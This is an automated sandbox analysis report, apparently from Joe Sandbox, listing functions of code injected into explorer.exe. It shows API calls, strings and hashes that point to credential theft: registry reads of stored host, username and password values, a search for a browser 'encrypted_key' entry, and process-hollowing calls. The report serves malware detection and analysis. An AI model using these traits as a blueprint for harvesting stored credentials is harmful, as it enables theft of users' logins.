Part of subcall function 000819E5: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00081A75
Part of subcall function 000819E5: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2,PortNumber,00000000,00000000), ref: 00081A98

Part of subcall function 0008482C: lstrlenW.KERNEL32(?), ref: 00084845
Part of subcall function 0008482C: lstrlenW.KERNEL32(?), ref: 0008488F
Part of subcall function 0008482C: lstrlenW.KERNEL32(?), ref: 00084897

wsprintfW.USER32 ref: 000849A7
wsprintfW.USER32 ref: 000849B9

Strings

Password, xrefs: 000848E4
%s:%u, xrefs: 00084971, 000849B7
%s:%u/%s, xrefs: 00084982, 000849A5
RemoteDirectory, xrefs: 000848F8
UserName, xrefs: 000848D2
HostName, xrefs: 000848C4

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: lstrlen$QueryValuewsprintf$CloseOpen
String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
API String ID: 2889301010-4273187114
Opcode ID: da7e63671b0f4e93c4154db471155565ad8701d4588ea6bee2a31a56f36f1af4
Instruction ID: 10d8c462f0a5d1c46246b3851c8024d5f0b7ca74f221d7c66667859a4483cc7f
Opcode Fuzzy Hash: da7e63671b0f4e93c4154db471155565ad8701d4588ea6bee2a31a56f36f1af4
Instruction Fuzzy Hash: 1631DE357043056BC760FBA5D84196BB6EDFF89788B05492EF4C587282DAB2DC0287A1

Function 0008F92F Relevance: 12.4, APIs: 4, Strings: 4, Instructions: 350COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?,?,00000000), ref: 0008FB32
memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0008FB4D
memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0008FB60
memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 0008FB95

Strings

nolock, xrefs: 0008FC4E
-journal, xrefs: 0008FB6B
-wal, xrefs: 0008FBA9
immutable, xrefs: 0008FC68

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: memcpy
String ID: -journal$-wal$immutable$nolock
API String ID: 3510742995-3408036318
Opcode ID: 2ba235b4505612062e78cee2fce8280b65b643895955b6fa507b90e5b2a5b768
Instruction ID: 294a5ab0152734e0fc343f7e435cb1baaece950d4deabf5daa23531a8e1283f6
Opcode Fuzzy Hash: 2ba235b4505612062e78cee2fce8280b65b643895955b6fa507b90e5b2a5b768
Instruction Fuzzy Hash: 33D19FB16083418FDB14EF28C881B6ABBE5BF95314F08457DE8D98B392DB75D805CB62

Function 00087820 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 407COMMON

Download Yara Rule

Strings

%, xrefs: 00087822
NaN, xrefs: 000873F8
-x0, xrefs: 00087325

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID:
String ID: %$-x0$NaN
API String ID: 0-62881354
Opcode ID: b7fc07bd73d9a66ecfa12115a04d499e187338113120827c6c09aada8c07791c
Instruction ID: 6c4157ef6abc8789903b41b48f2750967716a0974ef9a8a2f7a86ce0e4b3c3ae
Opcode Fuzzy Hash: b7fc07bd73d9a66ecfa12115a04d499e187338113120827c6c09aada8c07791c
Instruction Fuzzy Hash: 11D1233060C3828BD775AA28849477EBBE1BF96304F38486EF8C98735AD665C941DB52

Function 000878B0 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 441COMMON

Download Yara Rule

Strings

NaN, xrefs: 000873F8
-x0, xrefs: 00087325

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: baa124e87dbeebc4b253c9e50b368a5f420b0208ca8c1b5c65a5900b34f298eb
Instruction ID: 307a0fbc714bec583ddb3da5ca31e1c7d01a1585dd17795543b9f6cbd4a72020
Opcode Fuzzy Hash: baa124e87dbeebc4b253c9e50b368a5f420b0208ca8c1b5c65a5900b34f298eb
Instruction Fuzzy Hash: 93E1253060C3828BD775AA28C49476EBBE1BF96304F38486EF8C99735AD665CD40DB52

Function 00087A5C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 431COMMON

Download Yara Rule

Strings

NaN, xrefs: 000873F8
-x0, xrefs: 00087325

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: ebc82d06261bcdc239f2784bd31ea377c46de16c779e0eaa0c3f6f362a9a2d65
Instruction ID: 5af4e4da5cea5f154fd119f3d2ed9d99af7aef6557b7613b941435b73212b324
Opcode Fuzzy Hash: ebc82d06261bcdc239f2784bd31ea377c46de16c779e0eaa0c3f6f362a9a2d65
Instruction Fuzzy Hash: F7E1023060C3828BD765EE28C49476EBBE1BF96304F38486EF8C98735AD665CD41DB52

Function 00087A28 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 426COMMON

Download Yara Rule

Strings

NaN, xrefs: 000873F8
-x0, xrefs: 00087325

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: 532721f6db3cf2cbfeb1db598ccdea50ef7b32de67f7a8ad80d7cb47558c555b
Instruction ID: 38d80dc272db12f369c27d8ab9e1b9b3f46e7504c94a09ddbb968d65dca4388f
Opcode Fuzzy Hash: 532721f6db3cf2cbfeb1db598ccdea50ef7b32de67f7a8ad80d7cb47558c555b
Instruction Fuzzy Hash: 5EE1133060C3828BD765EE28C49476EBBE1BF96304F38486EF8C99735AD675C940DB52

Function 000877F9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 414COMMON

Download Yara Rule

Strings

NaN, xrefs: 000873F8
-x0, xrefs: 00087325

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID:
String ID: -x0$NaN
API String ID: 0-3447725786
Opcode ID: 33658ef99b809653cf9f5d760d5af93decb8784d64679dbb4ead0c2aed41e7c4
Instruction ID: 9eb325d8b13de8419a12c3c1fdebbe1caf842573b04f619f98d2af9db357284b
Opcode Fuzzy Hash: 33658ef99b809653cf9f5d760d5af93decb8784d64679dbb4ead0c2aed41e7c4
Instruction Fuzzy Hash: 9BE1123060C3828BD765EF28C49476EBBE1BF96304F38486EF8C99735AD665C940DB52

Function 000870C9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 403COMMON

Download Yara Rule

APIs

_aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 0008720E
_aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 00087226
_aulldvrm.NTDLL(00000000,00000000,?), ref: 0008727B

Strings

NaN, xrefs: 000873F8
-x0, xrefs: 00087325

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: _aulldvrm$_aullrem
String ID: -x0$NaN
API String ID: 105165338-3447725786
Opcode ID: 2362ef364301674ff0b2ccf661c30ce3b42df2588c24734a6dbe200c93ed4eb4
Instruction ID: 93f17d4b0f8c4b3a8157bc224e6fc931d5739e06ef0917fc6c2979ba7e56ff20
Opcode Fuzzy Hash: 2362ef364301674ff0b2ccf661c30ce3b42df2588c24734a6dbe200c93ed4eb4
Instruction Fuzzy Hash: E4D1123060C3828BD775AF28849477EBBE1BF96304F38486EF8C98735AD665C941DB52

Function 0008898F Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 353COMMON

Download Yara Rule

APIs

_allmul.NTDLL(00000000,?,0000000A,00000000), ref: 00088AAD
_allmul.NTDLL(?,?,0000000A,00000000), ref: 00088B66
_allmul.NTDLL(?,00000000,0000000A,00000000), ref: 00088C9B
_alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 00088CAE

Strings

., xrefs: 00088B17

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: _allmul$_alldvrm
String ID: .
API String ID: 115548886-248832578
Opcode ID: 1dee9addea6f3844f4b09b2805f88c775bd20230e2989cbee6f0ea89815203b6
Instruction ID: a618595783e7f2a3f3ba0156b31e79fd035265a36e404902bbfeef64cd03ac86
Opcode Fuzzy Hash: 1dee9addea6f3844f4b09b2805f88c775bd20230e2989cbee6f0ea89815203b6
Instruction Fuzzy Hash: E0D1F3B190C7858BD724EF08888427EBBF0FFD5314F44896EF6C596281DBB1C9458B96

Function 000AD684 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 000AD6A0
memset.NTDLL ref: 000AD6B3
memset.NTDLL ref: 000AD6C3

Strings

9, xrefs: 000AD701
,, xrefs: 000AD6FC
7, xrefs: 000AD71B

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: memset
String ID: ,$7$9
API String ID: 2221118986-1653249994
Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
Instruction ID: 702d2cd818da1550f47cb19b98de18b775bc913f1f07b666f171365b98cff46d
Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
Instruction Fuzzy Hash: EC316A715083849FE731DF60D844B8FBBE8AF85340F00892EF98997252EB759549CBA2

Function 00081BC5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,?,00082E75,PathToExe,00000000,00000000), ref: 00081BCC
StrStrIW.SHLWAPI(00000000,.exe), ref: 00081BF0
StrRChrIW.SHLWAPI(00000000,00000000,0000005C), ref: 00081C05
lstrlenW.KERNEL32(00000000,?,00082E75,PathToExe,00000000,00000000), ref: 00081C1C

Strings

.exe, xrefs: 00081BEA

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: lstrlen
String ID: .exe
API String ID: 1659193697-4119554291
Opcode ID: 3b6586b102a63786dc969872238a75f7c0e986793e750fed812a843c71e5f381
Instruction ID: a0118cb623026bdd7b2c274268af9be0d5b1314d990870a25fc60afa0df14884
Opcode Fuzzy Hash: 3b6586b102a63786dc969872238a75f7c0e986793e750fed812a843c71e5f381
Instruction Fuzzy Hash: 40F0C2343516209AE3757F34AC45AFB67ECFF05341B14482AE586C31A1EB658C82C769

Function 0008A67C Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON

Download Yara Rule

APIs

_alldiv.NTDLL(?,?,?), ref: 0008A6AD
_allmul.NTDLL(00000000,?,?), ref: 0008A6B6

Strings

winTruncate2, xrefs: 0008A717
@T, xrefs: 0008A6F3
winTruncate1, xrefs: 0008A6DF

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: _alldiv_allmul
String ID: @T$winTruncate1$winTruncate2
API String ID: 727729158-2430439695
Opcode ID: 6c3bc0ffe98ea7ba6db45ea80c207c7cd4ae0650a3233a974d4767bbabfbf473
Instruction ID: ea18af5ff0e1266221c05a6733f4e9d3e46abdbad8da32bdb85636b44682a127
Opcode Fuzzy Hash: 6c3bc0ffe98ea7ba6db45ea80c207c7cd4ae0650a3233a974d4767bbabfbf473
Instruction Fuzzy Hash: 8D21B031305200ABEF54AE29CC85EAB37A9FF86310B55812AFD84DB646E634D810D762

Function 00092FF6 Relevance: 6.6, APIs: 5, Instructions: 369COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000018), ref: 0009316F
_allmul.NTDLL(-00000001,00000000,?,?), ref: 000931D2
_alldiv.NTDLL(?,?,00000000), ref: 000932DE
_allmul.NTDLL(00000000,?,00000000), ref: 000932E7
_allmul.NTDLL(?,00000000,?,?), ref: 00093392

Part of subcall function 000916CD: memset.NTDLL ref: 0009172B

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: _allmul$_alldivmemset
String ID:
API String ID: 3880648599-0
Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
Instruction ID: 7d5417d354a438c68078f624bfc985cf19b5d1ae52062b2927a0073bfdafc28c
Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
Instruction Fuzzy Hash: C1D188706083419BDB64DF69C480BAEBBE1BF88704F14882DF99587252DB70EE45DF92

Function 000B87FA Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 388COMMON

Download Yara Rule

Strings

FOREIGN KEY constraint failed, xrefs: 000B8AC8
new, xrefs: 000B88AA
old, xrefs: 000B889E

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID:
String ID: FOREIGN KEY constraint failed$new$old
API String ID: 0-384346570
Opcode ID: 3aaead122d65ded614d39b256a48cbbc3585bd41769f8ec99ba0c062035d0474
Instruction ID: d2be0542dc7b103aa2383b59d4d19c985a4c98580b6e0a806adb31106ad231e1
Opcode Fuzzy Hash: 3aaead122d65ded614d39b256a48cbbc3585bd41769f8ec99ba0c062035d0474
Instruction Fuzzy Hash: 8FD14A707083009FD754DF64C481BAFBBE9AB89750F10891EF9458B392DB74D945CB92

Function 000896BC Relevance: 6.4, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

_alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 000896E7
_alldiv.NTDLL(00000000,80000000,?,?), ref: 00089707
_alldiv.NTDLL(00000000,80000000,?,?), ref: 00089739
_alldiv.NTDLL(00000001,80000000,?,?), ref: 0008976C
_allmul.NTDLL(?,?,?,?), ref: 00089798

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: _alldiv$_allmul
String ID:
API String ID: 4215241517-0
Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
Instruction ID: 2354deb6ee630c1303f222db6580eb32dc7d712fabd7219d97ed6de5167efc95
Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
Instruction Fuzzy Hash: 2E210F3222C7252AE7747D5A5CC0BBB3AC8FB90391F2D012EFCC182242FD52885083A2

Function 0009B162 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000000), ref: 0009B1B3
_alldvrm.NTDLL(?,?,00000000), ref: 0009B20F
_allrem.NTDLL(?,00000000,?,?), ref: 0009B28A
memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 0009B298

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: _alldvrm_allmul_allremmemcpy
String ID:
API String ID: 1484705121-0
Opcode ID: 737b708a8e9317edc1ac7e99e378c4384ccc493322af8983ed13a4c59795ab5c
Instruction ID: 34dcaf0522566fee0e357b28426f49add1cfa5add8272fba0f91c0916a67490a
Opcode Fuzzy Hash: 737b708a8e9317edc1ac7e99e378c4384ccc493322af8983ed13a4c59795ab5c
Instruction Fuzzy Hash: 6F4126716083019FCB58EF29D99196EBBE5EFC8310F04892DF98587262DB31EC05DB52

Function 00081895 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetHGlobalFromStream.OLE32(?,?), ref: 000818A7
GlobalFix.KERNEL32(00084B57), ref: 000818B6
GlobalUnWire.KERNEL32(?), ref: 000818F4

Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A

RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000818E8

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: Global$Heap$AllocateFromMemoryMoveProcessStreamWire
String ID:
API String ID: 2207111602-0
Opcode ID: 5cafbe28a3a3ec4851cb6a259a3ffa732d8cee4bddaac059c2034672973d27b0
Instruction ID: 060e2cafb6cd9e1f5da74f6afce5632343d673e94969e39a5aa9d19e364d1975
Opcode Fuzzy Hash: 5cafbe28a3a3ec4851cb6a259a3ffa732d8cee4bddaac059c2034672973d27b0
Instruction Fuzzy Hash: DE016D75205716AF9B016F65DC189DF7BEDFF84351B10842EF88583221EF36D9169B20

Function 00081953 Relevance: 6.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,00000000,?,?,00082F0C), ref: 00081973
lstrlenW.KERNEL32(000D6564,?,?,00082F0C), ref: 00081978
lstrcatW.KERNEL32(00000000,?), ref: 00081990
lstrcatW.KERNEL32(00000000,000D6564), ref: 00081994

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: lstrcatlstrlen
String ID:
API String ID: 1475610065-0
Opcode ID: 28fed4ad0f0cf8eadd10525803851a75bf33ec1a9cae8159dccb8e6dc05c9a80
Instruction ID: dbad73746742703d9ceac516fc3b64f4e155f3a4600329a9211bef27ba9de466
Opcode Fuzzy Hash: 28fed4ad0f0cf8eadd10525803851a75bf33ec1a9cae8159dccb8e6dc05c9a80
Instruction Fuzzy Hash: BCE065B230021C2B571477AE9C94DBB7BDCDFD96A5705003AFA45D3302EA569C0546B0

Function 00082FB1 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 31stringCOMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(00000000,"encrypted_key":"), ref: 00082FC1
lstrlen.KERNEL32("encrypted_key":",?,00083FA8), ref: 00082FCE
StrStrIA.SHLWAPI("encrypted_key":",000D692C), ref: 00082FDD

Part of subcall function 0008190B: lstrlen.KERNEL32(?,?,?,?,00000000,00082783), ref: 0008192B
Part of subcall function 0008190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00082783), ref: 00081930
Part of subcall function 0008190B: lstrcat.KERNEL32(00000000,?), ref: 00081946
Part of subcall function 0008190B: lstrcat.KERNEL32(00000000,00000000), ref: 0008194A

Strings

"encrypted_key":", xrefs: 00082FBA, 00082FBF, 00082FCD, 00082FDC

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: lstrlen$lstrcat
String ID: "encrypted_key":"
API String ID: 493641738-877455259
Opcode ID: a4322bf6803f9586c14811d2a79b8cf0638dba37bcc99194ce32fdcef0ee0d4f
Instruction ID: 530b9dc33729bb16010b955b94d5cbd9baf921e2c03f7890b7047916ace376ef
Opcode Fuzzy Hash: a4322bf6803f9586c14811d2a79b8cf0638dba37bcc99194ce32fdcef0ee0d4f
Instruction Fuzzy Hash: 34E09B366067645F93617BB95C548877F5CAF066113090076F74197213DF678801D7B4

Function 000AF21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 00086A81: memset.NTDLL ref: 00086A9C

_aulldiv.NTDLL(?,00000000,?,00000000), ref: 000AF2A1

Strings

%llu, xrefs: 000AF25E
%llu, xrefs: 000AF2A8

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: _aulldivmemset
String ID: %llu$%llu
API String ID: 714058258-4283164361
Opcode ID: 1fa5d3c7b91306c1d223e2b65371b4838854418b1e936b93da1fe013090c2820
Instruction ID: 69e4f2254b1926815d5b2e7edcfc80b6c22c58c624316906a26c5ce3a17bda3f
Opcode Fuzzy Hash: 1fa5d3c7b91306c1d223e2b65371b4838854418b1e936b93da1fe013090c2820
Instruction Fuzzy Hash: E221D4B26446066BCA10BA64CC42FBB7758AF81730F044239FA65972C2DB21DC1187E1

Function 0009203C Relevance: 5.3, APIs: 4, Instructions: 274COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,?), ref: 00092174
_allmul.NTDLL(?,?,?,00000000), ref: 0009220E
_allmul.NTDLL(?,00000000,00000000,?), ref: 00092241
_allmul.NTDLL(00082E26,00000000,?,?), ref: 00092295

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: _allmul
String ID:
API String ID: 4029198491-0
Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
Instruction ID: 63a2b8f53f14eb91fa2b34f2965950cece02bef0a7323c9bf8aaa3ee151b33ee
Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
Instruction Fuzzy Hash: 4DA19F70708702AFDB54EF64C891A6EB7E5AFD8704F00482DF6958B352EB71ED449B42

Function 000978B9 Relevance: 5.2, APIs: 4, Instructions: 227COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?,?), ref: 00097979
memset.NTDLL ref: 0009798A
memcpy.NTDLL(?,?,?), ref: 00097A00
memset.NTDLL ref: 00097A14

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: 4140e2bc45dec264c31e971d92f3cbd81a15c7904ba40de7e28c5e30a9fc9b6f
Instruction ID: 69a05d0e1e7b7fd6402ed86353928fc025ddec182e0930d0124d2d6646c1b3c6
Opcode Fuzzy Hash: 4140e2bc45dec264c31e971d92f3cbd81a15c7904ba40de7e28c5e30a9fc9b6f
Instruction Fuzzy Hash: D2818D7261C3149FC750EF28C880A6BBBE5FF88704F14492DF88A97252E670E905DB92

Function 0008190B Relevance: 5.0, APIs: 4, Instructions: 36stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,?,?,00000000,00082783), ref: 0008192B
lstrlen.KERNEL32(00000000,?,?,?,00000000,00082783), ref: 00081930
lstrcat.KERNEL32(00000000,?), ref: 00081946
lstrcat.KERNEL32(00000000,00000000), ref: 0008194A

Memory Dump Source

Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_81000_explorer.jbxd

Similarity

API ID: lstrcatlstrlen
String ID:
API String ID: 1475610065-0
Opcode ID: a9493810aaa3a9f76d00b8f14972c51386d0793da0f89b16e647a1f4bc78741e
Instruction ID: 3aa736acb3aa67acc1ae95169c8ee23454d81dbbc04c5d0cca38af8dffb300d9
Opcode Fuzzy Hash: a9493810aaa3a9f76d00b8f14972c51386d0793da0f89b16e647a1f4bc78741e
Instruction Fuzzy Hash: A6E09BA630021C2B572077AE5C94DBB77DCDFD95A53090036FE44C3302EE5AAC0247B0

Analysis Process: explorer.exePID: 3124, Parent PID: 1244COMMON

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	55.1%
Signature Coverage:	0%
Total number of Nodes:	49
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 000638B0 Relevance: 1.5, APIs: 1, Instructions: 40
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 000638F2

Memory Dump Source

Source File: 00000013.00000002.509020342.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_61000_explorer.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 175f204f98ddab081ce75ab585c860cf335b3b36596ebe57e2ab61619d8d81c0
Instruction ID: 07d7c0bebfd5eab35338b42f632c169550439883b7608d4425e9f1fe2b024cbe
Opcode Fuzzy Hash: 175f204f98ddab081ce75ab585c860cf335b3b36596ebe57e2ab61619d8d81c0
Instruction Fuzzy Hash: F3F0A020F11A080FEAAC77FD685D3A822C2EB59310F900629B516C36D3DC398A458352

Function 00063458 Relevance: 6.2, APIs: 4, Instructions: 172
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIW.SHLWAPI ref: 0006347E
RegOpenKeyExW.KERNEL32 ref: 0006353F
RegEnumKeyExW.KERNEL32 ref: 000635D6
RegCloseKey.KERNEL32 ref: 000635E9

Memory Dump Source

Source File: 00000013.00000002.509020342.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_61000_explorer.jbxd

Similarity

API ID: CloseEnumOpen
String ID:
API String ID: 1332880857-0
Opcode ID: e6d0cc022632efdd4a3c5a8daf3e56bcebce22f91e00e29876c625ce24938a9c
Instruction ID: d4483960c43caaeea037d42a9e10a4b875f7596f5693c41f599e3ec46e3d9013
Opcode Fuzzy Hash: e6d0cc022632efdd4a3c5a8daf3e56bcebce22f91e00e29876c625ce24938a9c
Instruction Fuzzy Hash: 82416C30718F0C4FDB98EF6D94997AAB6E2FBD8341F04456EA14EC3262DE34D9448782

Function 0006A298 Relevance: 4.8, APIs: 3, Instructions: 252
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 0006A397
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0006A441
VirtualProtect.KERNELBASE ref: 0006A45F

Memory Dump Source

Source File: 00000013.00000002.509020342.0000000000069000.00000040.80000000.00040000.00000000.sdmp, Offset: 00069000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_69000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
Instruction ID: 006bc09559ba58e1e56ca86166064d69eaa2f5b492dea585316237ca25ff1824
Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
Instruction Fuzzy Hash: 99517D3175892E4BCB24BB7C9CC42F5B3C3F757321B18062AD08AD3385D559D9468B93

Function 0006372C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
